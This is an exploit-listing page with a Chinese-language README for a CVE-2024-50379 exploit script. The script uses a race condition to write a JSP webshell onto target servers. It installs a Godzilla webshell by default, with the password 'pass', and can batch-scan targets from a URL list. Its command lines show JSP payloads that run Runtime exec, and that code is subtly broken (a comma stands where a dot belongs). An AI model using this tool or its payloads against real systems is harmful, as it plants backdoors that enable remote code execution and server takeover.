Share
## https://sploitus.com/exploit?id=2B5612C1-EF49-5570-9E15-C2572C0C52C6
# CVE-2024-50379-exp
测试发现第一次条件竞争时有很大几率会写入失败需要重新再进行一次条件竞争才会写入木马,所以脚本第一次会进行固定6秒条件竞争检测是否写入,没有会再进行用户自定义或者默认的10秒检测,生成的木马为随机md5.jsp,成功写入success.txt
使用方法
- -t 条件竞争时间 (不填默认10秒)
- -u 域名 (不填默认读取url.txt批量扫描)
- -f 写入木马 (不填默认Godzillav马,密码pass)
单个域名扫描
```
python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
```
批量扫描
```
python .\CVE-2024-50379.py -f '<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
```
